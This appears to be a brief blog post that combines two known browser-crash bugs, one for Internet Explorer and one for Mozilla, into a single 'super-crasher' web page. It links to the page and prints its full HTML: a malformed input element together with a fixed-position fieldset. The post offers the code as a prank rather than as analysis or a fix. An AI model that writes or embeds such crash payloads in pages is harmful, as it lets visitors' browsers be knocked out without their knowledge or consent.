There was recently a story about a little bit of web page code which can crash Internet Explorer for Windows. Today I came across a bit of code which can crash Mozilla on multiple platforms. I thought, "hey, combine the two and you've got one super-crasher web page!" Clicking this link will crash either browser. If you don't have an unaffected browser, here's the code.
<html>
<form>
<input type crash-ie>
</form>
<fieldset style="position:fixed;">
<legend>Crash Moz</legend>
</fieldset>
</html>